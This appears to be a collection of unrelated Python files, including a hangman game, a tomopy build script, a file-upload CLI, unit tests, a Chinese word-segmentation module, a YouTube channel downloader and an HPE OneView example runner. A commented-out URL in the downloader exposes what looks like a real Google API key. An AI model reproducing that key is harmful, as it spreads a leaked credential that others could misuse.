if not letter_index_dict.get(letter):
letter_index_dict[letter] = []
letter_index_dict[letter].append(idx)
while True:
os.system("cls") # Si estás en Unix (Mac o Linux) cambia cls por clear
print("¡Adivina la palabra!")
for element in chosen_word_list_underscores:
print(element + " ", end="")
print("\n")
letter = input("Ingresa una letra: ").strip().upper()
assert letter.isalpha(), "Solo puedes ingresar letras"
if letter in chosen_word_list:
for idx in letter_index_dict[letter]:
chosen_word_list_underscores[idx] = letter
if "_" not in chosen_word_list_underscores:
os.system("cls") # Si estás en Unix (Mac o Linux) cambia cls por clear
print("¡Ganaste! La palabra era", chosen_word)
break
if __name__ == '__main__':
run()
# Peeking at the solution? No worries, champ
# Python is better than JavaScript |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, glob, shutil, subprocess as sp
from skbuild import setup
from skbuild.setuptools_wrap import create_skbuild_argparser
import argparse
import warnings
import platform
cmake_args = []
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument("-h", "--help", help="Print help", action='store_true')
def add_bool_opt(opt, enable_opt, disable_opt):
global cmake_args
if enable_opt and disable_opt:
msg = """\nWarning! python options for CMake argument '{}' was enabled \
AND disabled.\nGiving priority to disable...\n""".format(opt)
warnings.warn(msg)
enable_opt = False
if enable_opt:
cmake_args.append("-D{}:BOOL={}".format(opt, "ON"))
if disable_opt:
cmake_args.append("-D{}:BOOL={}".format(opt, "OFF"))
def add_option(lc_name, disp_name):
global parser
# enable option
parser.add_argument("--enable-{}".format(lc_name), action='store_true',
help="Explicitly enable {} build".format(disp_name))
# disable option
parser.add_argument("--disable-{}".format(lc_name), action='store_true',
help="Explicitly disnable {} build".format(disp_name))
add_option("cuda", "CUDA")
add_option("nvtx", "NVTX (NVIDIA Nsight)")
add_option("arch", "Hardware optimized")
add_option("avx512", "AVX-512 optimized")
add_option("gperf", "gperftools")
add_option("timemory", "TiMemory")
add_option("sanitizer", "Enable sanitizer (default=leak)")
add_option("tasking", "Tasking library (PTL)")
parser.add_argument("--sanitizer-type", default="leak",
help="Set the sanitizer type",
type=str, choices=["leak", "thread", "address", "memory"])
parser.add_argument("--cuda-arch", help="CUDA architecture flag",
type=int, default=35)
args, left = parser.parse_known_args()
# if help was requested, print these options and then add '--help' back
# into arguments so that the skbuild/setuptools argparse catches it
if args.help:
parser.print_help()
left.append("--help")
sys.argv = sys.argv[:1]+left
add_bool_opt("TOMOPY_USE_CUDA", args.enable_cuda, args.disable_cuda)
add_bool_opt("TOMOPY_USE_NVTX", args.enable_nvtx, args.disable_nvtx)
if args.enable_avx512 and not args.enable_arch:
args.enable_arch = True
args.disable_arch = False
add_bool_opt("TOMOPY_USE_ARCH", args.enable_arch, args.disable_arch)
add_bool_opt("TOMOPY_USE_AVX512", args.enable_avx512, args.disable_avx512)
add_bool_opt("TOMOPY_USE_GPERF", args.enable_gperf, args.disable_gperf)
add_bool_opt("TOMOPY_USE_TIMEMORY", args.enable_timemory, args.disable_timemory)
add_bool_opt("TOMOPY_USE_SANITIZER", args.enable_sanitizer, args.disable_sanitizer)
add_bool_opt("TOMOPY_USE_PTL", args.enable_tasking, args.disable_tasking)
if args.enable_cuda:
cmake_args.append("-DCUDA_ARCH={}".format(args.cuda_arch))
if args.enable_sanitizer:
cmake_args.append("-DSANITIZER_TYPE:STRING={}".format(args.sanitizer_type))
if len(cmake_args) > 0:
print("\n\n\tCMake arguments set via command line: {}\n".format(cmake_args))
if platform.system() == "Darwin":
# scikit-build will set this to 10.6 and C++ compiler check will fail
version = platform.mac_ver()[0].split('.')
version = ".".join([version[0], version[1]])
cmake_args += ["-DCMAKE_OSX_DEPLOYMENT_TARGET={}".format(version)]
# suppress:
# "setuptools_scm/git.py:68: UserWarning: "/.../tomopy" is shallow and may cause errors"
# since 'error' in output causes CDash to interpret warning as error
with warnings.catch_warnings():
warnings.simplefilter("ignore")
setup(
name='tomopy',
packages=['tomopy'],
package_dir={"": "source"},
setup_requires=['setuptools_scm', 'setuptools_scm_git_archive'],
use_scm_version=True,
include_package_data=True,
zip_safe=False,
author='Doga Gursoy',
author_email='[email protected]',
description='Tomographic Reconstruction in Python.',
keywords=['tomography', 'reconstruction', 'imaging'],
url='http://tomopy.readthedocs.org',
download_url='http://github.com/tomopy/tomopy.git',
license='BSD-3',
cmake_args=cmake_args,
        cmake_languages=('C',),
platforms='Any',
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Intended Audience :: Developers',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: C']
)
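# Illustrative invocation (a sketch, not from the original file; the flag names come from the
# add_option/add_bool_opt calls above, the CUDA arch value 61 is arbitrary):
#   python setup.py install --enable-cuda --cuda-arch=61 --disable-timemory
# which would forward CMake arguments such as:
#   -DTOMOPY_USE_CUDA:BOOL=ON -DCUDA_ARCH=61 -DTOMOPY_USE_TIMEMORY:BOOL=OFF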
|
#!/usr/bin/env python3
# Hiber [File/Link] CLI Client
# Jus de Patate - 2020
import sys
import os
import re
try:
import requests
except ImportError:
print("Couldn't import requests")
exit(1)
version = "1.0"
hiberfile = "https://hiberfile.com"
hiberlink = "https://hiber.link"
def shortLink(originalLink):
try:
r = requests.post(
hiberlink + "/link.php",
data={"link": originalLink},
headers={"User-Agent": "curl"},
)
    except requests.exceptions.RequestException as e:
        print("Couldn't send a request to " + hiberlink + ": " + str(e))
        sys.exit(1)
shortLink = r.text
if shortLink == "erreur":
print("Server returned an error")
else:
print(r.text)
def uploadFile(file):
fileDict = {"my_file": open(file, "rb")}
try:
r = requests.post(
hiberfile + "/send.php", files=fileDict, data={"time": "7 jours"}
)
    except requests.exceptions.RequestException as e:
        print("Upload failed: " + str(e))
        sys.exit(1)
fileLink = r.headers["X-HIBERFILE-LINK"]
if fileLink == "Erreur":
print("Server returned an error")
sys.exit(1)
else:
print(fileLink)
if len(sys.argv) < 2 or sys.argv[1] == "--help" or sys.argv[1] == "-h":
print("Hiber Client for CLI - Jus de Patate - " + version)
print("HiberFile instance is set at " + hiberfile)
print("HiberLink instance is set at " + hiberlink)
print("")
print("Please use either a file or an url as command argument")
elif os.path.exists(sys.argv[1]):
uploadFile(sys.argv[1])
elif re.match("^.*[.].*$", sys.argv[1]):
shortLink(sys.argv[1])
else:
print("Unrecognized argument")
|
# -*- coding: utf-8 -*-
"""
openedx_export_plugins Django application initialization.
"""
from django.apps import AppConfig
from openedx.core.djangoapps.plugins.constants import PluginURLs, ProjectType
class OpenedxExportPluginsConfig(AppConfig):
"""
Configuration for the openedx_export_plugins Django application.
"""
name = 'openedx_export_plugins'
plugin_app = {
PluginURLs.CONFIG: {
ProjectType.CMS: {
PluginURLs.NAMESPACE: 'openedx_export_plugins',
}
},
}
|
#!/usr/local/autopkg/python
import json
import plistlib
import unittest
from io import BytesIO
from tempfile import TemporaryDirectory
from unittest import mock
from unittest.mock import patch
from autopkglib import Preferences
TEST_JSON_PREFS = b"""{"CACHE_DIR": "/path/to/cache"}"""
TEST_PLIST_PREFS = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CACHE_DIR</key>
<string>/path/to/cache</string>
</dict>
</plist>
"""
def patch_open(data: bytes, **kwargs) -> mock._patch:
"""Patches `open` to return return a `BytesIO` object.
    This is similar to calling `patch("builtins.open", new_callable=mock_open, ...)`,
    but returns a real IO-type object that supports everything that the usual
    file object returned by open supports, ensuring greater compatibility with
    arbitrary libraries, at the cost of not resetting itself each time it's called."""
def _new_mock():
omock = mock.MagicMock(name="open", spec="open")
omock.side_effect = lambda *args, **kwargs: BytesIO(data)
return omock
return patch("builtins.open", new_callable=_new_mock, **kwargs)
class TestPreferences(unittest.TestCase):
"""Test Preferences class"""
PRIMARY_NON_MACOS_PLATFORMS = ["Linux", "Windows"]
def setUp(self):
self._workdir = TemporaryDirectory()
self.mock_platform = patch("autopkglib.sys.platform").start()
# Force loading to go through the file-backed path by default.
self.mock_platform.return_value = "__HighlyUnlikely-Platform-Name__"
# Mock all of these for all tests to help ensure we do not accidentally
# use the real macOS preference store.
self.mock_copykeylist = patch("autopkglib.CFPreferencesCopyKeyList").start()
# Return an empty list of preference keys by default. Makes a new list on
# every call to ensure no false sharing.
self.mock_copykeylist.side_effect = lambda *_, **_kw: list()
self.mock_copyappvalue = patch("autopkglib.CFPreferencesCopyAppValue").start()
self.mock_setappvalue = patch("autopkglib.CFPreferencesSetAppValue").start()
self.mock_appsynchronize = patch(
"autopkglib.CFPreferencesAppSynchronize"
).start()
self.mock_appdirs = patch("autopkglib.appdirs").start()
# Ensure we don't accidentally load real config and muck up tests.
self.mock_appdirs.user_config_dir.return_value = self._workdir.name
self.addCleanup(patch.stopall)
self.addCleanup(self._workdir.cleanup)
def tearDown(self):
pass
def test_new_prefs_object_is_empty(self):
"""A new Preferences object should be empty with no config."""
test_platforms = ["Darwin"]
test_platforms += self.PRIMARY_NON_MACOS_PLATFORMS
for platform in test_platforms:
with self.subTest(platform=platform):
self.mock_platform.return_value = platform
fake_prefs = Preferences()
self.assertEqual(fake_prefs.file_path, None)
self.assertEqual(fake_prefs.type, None)
self.assertEqual(fake_prefs.get_all_prefs(), {})
def test_get_macos_pref_returns_value(self):
"""get_macos_pref should return a value."""
self.mock_copyappvalue.return_value = "FakeValue"
fake_prefs = Preferences()
value = fake_prefs._get_macos_pref("fake")
self.assertEqual(value, "FakeValue")
def test_parse_file_is_empty_by_default(self):
"""Parsing a non-existent file should return an empty dict."""
fake_prefs = Preferences()
value = fake_prefs._parse_json_or_plist_file("fake_filepath")
self.assertEqual(value, {})
@patch_open(TEST_JSON_PREFS)
def test_parse_file_reads_json(self, _mock_file):
"""Parsing a JSON file should produce a dictionary."""
fake_prefs = Preferences()
value = fake_prefs._parse_json_or_plist_file("fake_filepath")
self.assertEqual(value, json.loads(TEST_JSON_PREFS))
@patch_open(TEST_PLIST_PREFS)
def test_parse_file_reads_plist(self, _mock_file):
"""Parsing a PList file should produce a dictionary."""
fake_prefs = Preferences()
value = fake_prefs._parse_json_or_plist_file("fake_filepath")
self.assertEqual(value, plistlib.loads(TEST_PLIST_PREFS))
@patch_open(TEST_PLIST_PREFS)
def test_read_file_fills_prefs(self, _mock_file):
"""read_file should populate the prefs object."""
fake_prefs = Preferences()
fake_prefs.read_file("fake_filepath")
value = fake_prefs.get_all_prefs()
self.assertEqual(value, plistlib.loads(TEST_PLIST_PREFS))
self.assertEqual(fake_prefs.type, "plist")
@patch.object(Preferences, "write_file")
@patch.object(Preferences, "_set_macos_pref")
    def test_set_pref_no_file(self, mock_set_macos_pref, mock_write_file):
"""set_pref should change the prefs object, but not write when no file loaded"""
fake_prefs = Preferences()
fake_prefs.set_pref("TEST_KEY", "fake_value")
mock_write_file.assert_not_called()
mock_set_macos_pref.assert_not_called()
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
@patch_open(TEST_JSON_PREFS)
def test_init_prefs_files(self, _mock_open):
"""Preferences should load file-backed config on primary platforms."""
for actual_platform in self.PRIMARY_NON_MACOS_PLATFORMS:
with self.subTest(platform=actual_platform):
self.mock_platform.return_value = actual_platform
prefs = Preferences()
self.assertNotEqual(prefs.file_path, None)
value = prefs.get_all_prefs()
self.assertEqual(value, json.loads(TEST_JSON_PREFS))
self.assertEqual(prefs.type, "json")
@patch_open(b"{}")
@patch.object(Preferences, "write_file")
def test_set_pref_files(self, mock_write_file, mock_open):
"""Preferences().set_pref should write file on file-backed config platforms"""
for actual_platform in self.PRIMARY_NON_MACOS_PLATFORMS:
with self.subTest(platform=actual_platform):
self.mock_platform.return_value = actual_platform
fake_prefs = Preferences()
self.assertNotEqual(fake_prefs.file_path, None)
fake_prefs.set_pref("TEST_KEY", "fake_value")
mock_write_file.assert_called()
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
mock_write_file.reset_mock()
@patch.object(Preferences, "_set_macos_pref")
def test_set_pref_mac(self, mock_set_macos_pref):
"""Preferences().set_pref should write macOS preference store on macOS."""
self.mock_platform.lower.return_value = "darwin"
fake_prefs = Preferences()
fake_prefs.set_pref("TEST_KEY", "fake_value")
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
mock_set_macos_pref.assert_called()
@patch.object(Preferences, "_set_macos_pref")
@patch.object(Preferences, "write_file")
@patch_open(TEST_JSON_PREFS)
def test_set_pref_mac_files(self, mock_open, mock_write_file, mock_set_macos_pref):
"""Preferences().set_pref should write file on macOS and read_file() used."""
self.mock_platform.return_value = "darwin"
fake_prefs = Preferences()
fake_prefs.read_file("fake_config_file")
mock_open.assert_called()
fake_prefs.set_pref("TEST_KEY", "fake_value")
mock_write_file.assert_called()
mock_set_macos_pref.assert_not_called()
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
|
#!/usr/bin/env python3
"""
Created on 26 May 2021
@author: Bruno Beloff ([email protected])
"""
import requests
from scs_core.aws.manager.configuration_check_requester import ConfigurationCheckRequester
# --------------------------------------------------------------------------------------------------------------------
requester = ConfigurationCheckRequester(requests, None)
print(requester)
print("-")
response = requester.request('scs-bgx-401')
print(response)
response = requester.request('scs-unknown')
print(response)
|
# Compute the adjacency (neighbour) information entropy
# Given an adjacency list, return its information entropy
from util import entropy, P, eMax, getSeq, cleanStopWord
def wordRank(seq, text):
"""
    A word's flexibility is judged by its left-neighbour and right-neighbour character sets
"""
LeftSet, RightSet = [], []
cur = text.find(seq)
wl = len(seq)
while cur != -1:
if cur != 0:
LeftSet.append(text[cur - 1:cur])
RightSet.append(text[cur + wl:cur + wl + 1])
cur = text.find(seq, cur + len(seq))
entr = min(entropy(LeftSet), entropy(RightSet))
if entr == 0:
return 0
return 1 / entr
# def C(n, m):
# return math.factorial(n) / (math.factorial(m) * math.factorial(n - m))
# def wordLen(text):
# """出现字符个数"""
# count = 0
# temp = []
# for s in text:
# if (s not in temp):
# count += 1
# temp.append(s)
# return count
def wordCohesion(seq, text):
"""
    A word's cohesion is measured by how much more likely the full sequence is than its parts:
    the minimum over all two-way splits of P(seq) / (P(left) * P(right))
"""
Pseq = P(seq, text)
subPairs = [[seq[:i], seq[i:]] for i in range(1, len(seq))]
pPair = map(lambda pair: Pseq / (P(pair[0], text) * P(pair[1], text)),
subPairs)
return min(pPair)
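# Worked sketch of the two signals above (illustrative, no real numbers):
#   wordCohesion("四十", text) = min over splits of P("四十") / (P("四") * P("十")),
#     i.e. how much more often the full sequence occurs than its parts would suggest;
#   wordRank(seq, text) returns 1 / min(left-neighbour entropy, right-neighbour entropy)
#     of the characters adjacent to seq (and 0 when that minimum entropy is 0).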
def seqsScore(text, maxlen=4, normalization=True):
assert maxlen >= 2
seqs = []
for i in range(2, maxlen + 1):
seqs += getSeq(text, i)
scores = []
fmax, fmin = 0, 0
cmax, cmin = 0, 0
rmax, rmin = 0, 0
for word in seqs:
ws = {
"self": word,
"freq": text.count(word),
"cohes": wordCohesion(word, text),
"rank": wordRank(word, text)
}
if ws["rank"] == 0:
continue
scores.append(ws)
if ws["freq"] > fmax:
fmax = ws["freq"]
if ws["freq"] < fmin:
fmin = ws["freq"]
if ws["cohes"] > cmax:
cmax = ws["cohes"]
if ws["cohes"] < cmin:
cmin = ws["cohes"]
if ws["rank"] > rmax:
rmax = ws["rank"]
if ws["rank"] < rmin:
rmin = ws["rank"]
if not normalization:
return scores
# normalization
for ws in scores:
ws["freq"] = eMax(ws["freq"], fmin, fmax)
ws["cohes"] = eMax(ws["cohes"], cmin, cmax)
ws["rank"] = eMax(ws["rank"], rmin, rmax)
ws["score"] = ws["freq"] * ws["cohes"] * ws["rank"]
return scores
def shift(words):
    cleaned = []
    words = sorted(words, key=lambda x: len(x))
    for w in words:
        w = cleanStopWord(w)
        # if len(w) == 1:
        #     continue
        while True:
            if w == "":
                break
            canQuit = True
            for c in cleaned:
                if w.find(c) != -1:
                    w = w.replace(c, "")
                    canQuit = False
                    break
            if canQuit:
                break
        if w != "":
            cleaned.append(w)
    return cleaned
def dig(text, maxlen=4):
assert maxlen >= 2
scores = seqsScore(text, maxlen)
scores = sorted(scores, key=lambda x: x["score"])
return [s["self"] for s in scores[::-1]]
def dictPart(text, wd, maxl):
src = text
ts = []
while len(text) != 0:
seqs = getSeq(text, maxl) + [i for i in text]
hit = False
for s in seqs:
if s in wd:
ts.append(s)
text = text.replace(s, "", 1)
hit = True
break
if not hit:
ts += [text]
break
return sorted(ts, key=lambda x: src.find(x))
def autoParticiple(text, maxlen=5):
words = dig(text, maxlen)
words = shift(words)
words = sorted(words, key=lambda x: -len(x))
wMax = max([len(x) for x in words])
tokens = []
seq = ""
for s in text:
seq += s
if len(seq) >= wMax:
tokens += dictPart(seq, words, wMax)
seq = ""
if seq in words:
tokens.append(seq)
seq = ""
return tokens
if __name__ == "__main__":
from pprint import pprint
# res = entropy(["哈", "哈", "a", "this"])
# res = entropy(["哈", "哈", "哈", "哈"])
# print(res)
text = ""
text1 = "四是四十是十十四是十四四十是四十"
text2 = "十四是十四四十是四十,十四不是四十,四十不是十四"
# print(wordCohesion("信息", text))
# print(wordRank("信息", text))
# print(wordLen(text))
# print(C(wordLen(text), 2))
# print(getSeq(text, 1))
# ss = seqsScore(text1)
# top = [x["self"] for
# x in sorted(ss, lambda x: x["score"])[::-1][:10]]
# print(top)
# print(dig(text1))
print(shift(dig(text, 5)))
# print(shift(dig(text2)))
# print(" ".join(autoParticiple(text)))
# print(" ".join(autoParticiple(text2)))
# print(" ".join(autoParticiple(text1)))
# print(autoParticiple(text1,maxlen=2))
# pprint(seqsScore(text,4,False))
# print(wordRank("四是",text1))
|
# Steven Atkinson
# [email protected]
# April 5, 2018
"""
Elliptic problem
Dimensionality reduction is data-driven and Bayesian; inputs to the forward
surrogate are uncertain.
Uses two KGPLVMs
"""
from __future__ import absolute_import
from . import data, train, train_doe, analysis, util |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 16 18:26:18 2020
@author: Wilson
"""
import json, requests, time, random
from pytube import YouTube
from datetime import datetime
from sys import exit
import re, io
count = 0
countDL = 0
countSkip = 0
starttime = datetime.now()
#random timer wait
def wait(start, end):
time.sleep(random.uniform(start,end))
# ffmpeg helper to merge discrete video/audio tracks into one file - requires the ffmpeg-python pip package and an ffmpeg binary on the system PATH (e.g. on Windows)
#Ensure that subdirectories videos\ProcessedVideos already exist
import ffmpeg
def AVprocess(v, a, d):
input_video = ffmpeg.input(str(d) + str(v))
input_audio = ffmpeg.input(str(d) + str(a))
ffmpeg.output(input_audio, input_video, str(d) + 'ProcessedVideos/' + str(v)).run()
#YouTube Download Function
from os import path
def YouTubeDL(vID, vTitle, vEpisode):
global countDL
global countSkip
fileName = str(str(vEpisode[0:3]).zfill(3) + "-" + str(vID) + "-" + vTitle)
ytLink = str('https://www.youtube.com/watch?v=') + str(vID)
if path.exists('./videos/' + fileName + '.mp4') or path.exists('./videos/ProcessedVideos/' + fileName + '1080p.mp4'):
#checks video directory for Progressive video already existing to avoid repeated downloads
print('SKIPPED - YouTube file ' + fileName + ' located at ' + ytLink + ' already exists in directory.')
countSkip +=1
else: #downloads and converts videos if not already downloaded
wait(1,5) #random wait times to pause automation from violating YT TOS
yt = YouTube(ytLink)
#Progressive Video Download (<720p)
video = yt.streams.filter(progressive='True').first()
#fileName = (str(videoEpisode) + "-" + str(videoTitle) + "-" + videoID)
video.download('./videos',fileName)
#High Resolution Video/Audio Download
video = yt.streams.filter(resolution='1080p').first()
video.download('./videos',fileName + '1080p')
audio = yt.streams.filter(abr='160kbps').first()
audio.download('./videos',fileName + '160kbps')
#English Caption Download
        try:  # error handling for cases where subtitles may not exist or are erroneous
captionFile = io.open('./videos/' + fileName + '.srt',mode='w',encoding='utf-8')
#caption = yt.captions.get_by_language_code('en') old deprecated function
caption = yt.captions['en'] #new dictionary call (untested)
captionFile.write(caption.generate_srt_captions())
captionFile.close()
except:
            Logging('Caption generation failed for video ' + vID)
pass
#Combine High Resolution
try:
AVprocess(fileName+'1080p.mp4', fileName+'160kbps.webm', './videos/')
countDL += 1
except:
            Logging('AVprocess failed for video ' + vID)
pass
#Writes same SRT file for Hi Resolution Video
try:
captionFile2 = io.open('./videos/ProcessedVideos/' + fileName + '1080p.srt',mode='w',encoding='utf-8')
captionFile2.write(caption.generate_srt_captions())
captionFile2.close()
except:
            Logging('Caption generation failed for video ' + vID)
pass
def Logging(text):
Log = io.open('YTlog.txt',mode='a+',encoding='utf-8')
Log.write(str(datetime.today().strftime('%m.%d.%Y-%H:%M:%S')) + " - " + text + "\n")
Log.close()
#URL must include valid Google YouTube Data API V3 API Key
#YouTube Playlist API returns different JSON structures
#url = 'https://www.googleapis.com/youtube/v3/playlistItems?playlistId=PLS-7gvHvjh_CW6pL2lSHtu0CO_iUAj8E9&maxResults=50&part=snippet&key=AIzaSyCGXnwsFt6S7sRq7zwuGPvDLU0zvKbgHwE'
url = 'https://www.googleapis.com/youtube/v3/search?part=snippet&channelId=UCpZqbJnB1yr3pzNgYGjWvfw&maxResults=50&order=date&q=gudetama%2Banimation%2Bepisode%2Bofficial%2Bupload%2B%E3%80%90Sanrio%2BOfficial%E3%80%91&type=video&key=[API KEY]'
response = requests.get(url)
data = json.loads(response.text)
videos = {}
vList = io.open('videoList.txt',mode='w',encoding='utf-8')
try:
for x in range(len(data['items'])):
#print(data['items'][x]['id']['videoId'])
#links.append(str('https://www.youtube.com/watch?v=') + str(data['items'][x]['snippet']['resourceId']['videoId']))
videoID = data['items'][x]['id']['videoId']
videoTitle = data['items'][x]['snippet']['title']
videos[videoID] = videoTitle #writes video ID/title as dictionary pair
videoEpisode = re.sub('[^0-9]','', videoTitle) #extracts only digits from video title
#videoList(videoID) #writes video ID into a link for reference
vList.write(str('https://www.youtube.com/watch?v=') + str(videoID) + "\n")
YouTubeDL(videoID, videoTitle, videoEpisode) #Downloads YouTube video
count += 1
except KeyError:
starttime = datetime.now() - starttime
print('An API exception has occurred, this may be due to API quota limitation.')
Logging(str(" - An API exception has occurred" + str(count) + " videos found, "
+ str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds."))
exit()
while 'nextPageToken' in data:
try:
paginationToken = data['nextPageToken']
url2 = url + '&pageToken=' + paginationToken
response = requests.get(url2)
data = json.loads(response.text)
for x in range(len(data['items'])):
videoID = data['items'][x]['id']['videoId']
videoTitle = data['items'][x]['snippet']['title']
videos[videoID] = videoTitle
videoEpisode = re.sub('[^0-9]','', videoTitle)
#videoList(videoID) #writes video ID into a link for reference
vList.write(str('https://www.youtube.com/watch?v=') + str(videoID) + "\n")
YouTubeDL(videoID, videoTitle, videoEpisode) #Downloads YouTube video
count += 1
except KeyError:
starttime = datetime.now() - starttime
print('An API exception has occurred, this may be due to API quota limitation.')
Logging(str(" - An API exception has occurred" + str(count) + " videos found, "
+ str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds."))
exit()
vList.close()
#End of Script Logging function
starttime = datetime.now() - starttime
Logging(str(str(count) + " videos found, " + str(countSkip) + " videos skipped, and "
            + str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds."))
print(str(count) + " videos found, " + str(countSkip) + " videos skipped, and "
      + str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds." + "\n")
|
import logging, fileinput, fnmatch, subprocess
import requests
from bs4 import BeautifulSoup
import sys
import os
from datetime import datetime
import re
from subprocess import Popen, STDOUT, PIPE
from ansible_playbook_runner import Runner
api_version = '2600'
rel_dict = {
'Appliance Configuration Timeconfig': 'appliance_configuration_timeconfig',
'Appliance SNMPv1 Trap Destinations': 'appliance_device_snmp_v1_trap_destinations',
'Appliance SNMPv3 Users': 'appliance_device_snmp_v3_users',
'Appliance SNMPv3 Trap Destinations': 'appliance_device_snmp_v3_trap_destinations',
'Appliance SSH Access': 'appliance_ssh_access',
'Appliance Device Read Community': 'appliance_device_read_community',
'Appliance Time and Locale Configuration': 'appliance_time_and_locale_configuration',
'ID Pool IPv4 Subnets': 'id_pools_ipv4_subnets',
'ID Pool IPv4 Range': 'id_pools_ipv4_ranges',
'FC Networks': 'fc_networks',
'FCoE Networks': 'fcoe_networks',
'Ethernet Networks': 'ethernet_networks',
'Network Sets': 'network_sets',
'Connection Templates': 'connection_templates',
'Certificates Server': 'certificates_server',
'Enclosures': 'enclosures',
'Enclosure Groups': 'enclosure_groups',
'Firmware Drivers': 'firmware_drivers',
'Hypervisor Cluster Profiles': 'hypervisor_cluster_profiles',
'Hypervisor Managers': 'hypervisor_managers',
'Interconnects': 'interconnects',
'Interconnect Types': 'interconnect_types',
'Logical Enclosures': 'logical_enclosures',
'Logical Interconnects': 'logical_interconnects',
'Logical Interconnect Groups': 'logical_interconnect_groups',
'Scopes': 'scopes',
'Server Hardware': 'server_hardware',
'Server Hardware Types': 'server_hardware_types',
'Server Profiles': 'server_profiles',
'Server Profile Templates': 'server_profile_templates',
'Storage Pools': 'storage_pools',
'Storage Systems': 'storage_systems',
'Storage Volume Templates': 'storage_volume_templates',
'Storage Volume Attachments': 'storage_volume_attachments',
'Volumes': 'volumes',
'Tasks': 'tasks',
'Uplink Sets': 'uplink_sets'
}
class DataFromWebScraping(object):
def __init__(self, ele):
self.ele = ele
if self.ele == 'certificates_server':
self.replaced_ele = self.ele.replace('certificates_server', '/certificates/servers')
elif self.ele == 'volumes':
self.replaced_ele = self.ele.replace('volumes', 'storage-volumes')
else:
self.replaced_ele = self.ele.replace('_', '-')
def data_scraped(self):
"""
        Scraping data for a list of endpoints from the API docs.
"""
URL = "https://techlibrary.hpe.com/docs/enterprise/servers/oneview5.3/cicf-api/en/rest/" + self.replaced_ele + ".html.js"
r = requests.get(URL)
soup = BeautifulSoup(r.content,
'html5lib') # If this line causes an error, run 'pip install html5lib' or install html5lib
body = soup.find('body')
string = str(body).replace('<body>define([],"', '').replace('");</body>', '')
soup = BeautifulSoup(string, 'html5lib')
api_list = soup.find('div', {"class": "\\\"api-list\\\""})
api_with_method = []
http_methods = []
apis = []
for span in api_list.find_all('span', {'class', '\\\"uri\\\"'}):
apis.append(span.text.strip())
for span in api_list.find_all('span', {'class', '\\\"method'}):
http_methods.append(span.text.strip())
for http_method, api in zip(http_methods, apis):
api_with_method.append({api, http_method})
return api_with_method
class Tee(object):
"""
    To show logs on the console while also flushing them to the log file.
"""
def __init__(self, filename):
self.stdout = sys.stdout
self.file = filename
def write(self, obj):
self.file.write(obj)
self.stdout.write(obj)
self.file.flush()
def flush(self):
self.stdout.flush()
self.file.flush()
def runAnsiblePlaybooks(success_files, failed_files):
"""
    To run ansible playbooks using the ansible_playbook_runner Python module.
"""
ansible_modules_list = open('ansible_modules_list', 'r')
resources_for_ansible = ansible_modules_list.read().splitlines()
ansible_modules_list.close()
loaded_resources_for_ansible = modifyExecutedFiles(resources_for_ansible)
print("loaded_resources for ansible are {}".format(str(loaded_resources_for_ansible)))
try:
for resource_for_ansible in resources_for_ansible:
result = Runner(['/etc/ansible/hosts'], resource_for_ansible).run()
if result == 0:
success_files.append(resource_for_ansible)
else:
failed_files.append(resource_for_ansible)
except Exception as e:
print("Error while executing playbook {}".format(str(e)))
return success_files, failed_files
def LoadResourcesFromFile():
"""
    To load resources (examples) from an external config file.
"""
resource_file = open('re.txt', 'r')
resources_from_file = resource_file.read().splitlines()
resource_file.close()
return resources_from_file
def modifyExecutedFiles(executed_files):
"""
    Modifying ansible playbook names to make them uniform across all SDKs
"""
exe = []
for executed_file in executed_files:
executed_file = executed_file.replace('.yml', '').replace('oneview_', '').replace('_facts', '')
executed_file = executed_file + 's'
exe.append(executed_file)
return list(set(exe))
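# Illustrative example of the renaming above (hypothetical playbook name):
#   'oneview_fc_network_facts.yml' -> strip '.yml', 'oneview_', '_facts' -> 'fc_network' + 's' -> 'fc_networks'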
def ExecuteFiles(selected_sdk):
is_ansible = False
if selected_sdk not in ['ansible']:
loaded_resources = LoadResourcesFromFile()
print("loaded_resources are {}".format(str(loaded_resources)))
cwd = os.getcwd()
failed_files = []
success_files = []
examples = []
val = selected_sdk
valid_sdks = ['python', 'ruby', 'go', 'ansible', 'puppet', 'chef', 'terraform']
if val in ['ruby', 'chef', 'puppet']:
rel_dict2 = {'Storage Volume Templates': 'volume_templates',
'Storage Volume Attachments': 'volume_attachments',
'Certificates Server': 'server_certificates',
'Server Hardware': 'server_hardwares',
}
rel_dict.update(rel_dict2)
else:
pass
print("Started executing files")
LOG_FILENAME = datetime.now().strftime('logfile_%H_%M_%d_%m_%Y.log')
f = open(LOG_FILENAME, 'w')
original = sys.stdout
sys.stdout = Tee(f)
if val in valid_sdks and val == 'ansible':
is_ansible = True
        success_files, failed_files = runAnsiblePlaybooks(success_files, failed_files)
        sys.stdout = original
        f.close()
        return success_files, is_ansible, val
else:
pass
if val in valid_sdks and val != 'ansible':
for ele in loaded_resources:
examples.append(rel_dict[ele])
for example in examples:
example_file = cwd + '/' + example
try:
if val == 'python':
example_file_with_extension = example_file + str('.py')
print(">> Executing {}..".format(example))
exec (compile(open(example_file_with_extension).read(), example_file_with_extension, 'exec'))
success_files.append(example)
elif val == 'ruby' and example not in ['tasks', 'interconnect_types']:
example_file_with_extension = example_file[:-1] + str('.rb')
cmd = "ruby {}".format(example_file_with_extension)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
